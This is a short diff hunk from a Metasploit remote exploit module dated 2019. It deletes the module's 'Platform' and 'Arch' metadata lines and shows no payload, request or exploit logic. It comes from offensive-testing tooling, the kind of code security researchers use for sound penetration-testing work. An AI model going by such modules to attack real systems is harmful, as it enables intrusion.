@@ -46,8 +46,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-12-17',
         'License' => MSF_LICENSE,
-        'Platform' => ['python', 'unix'],
-        'Arch' => [ARCH_PYTHON, ARCH_CMD],
         'Privileged' => false,
         'Targets' => [
           [
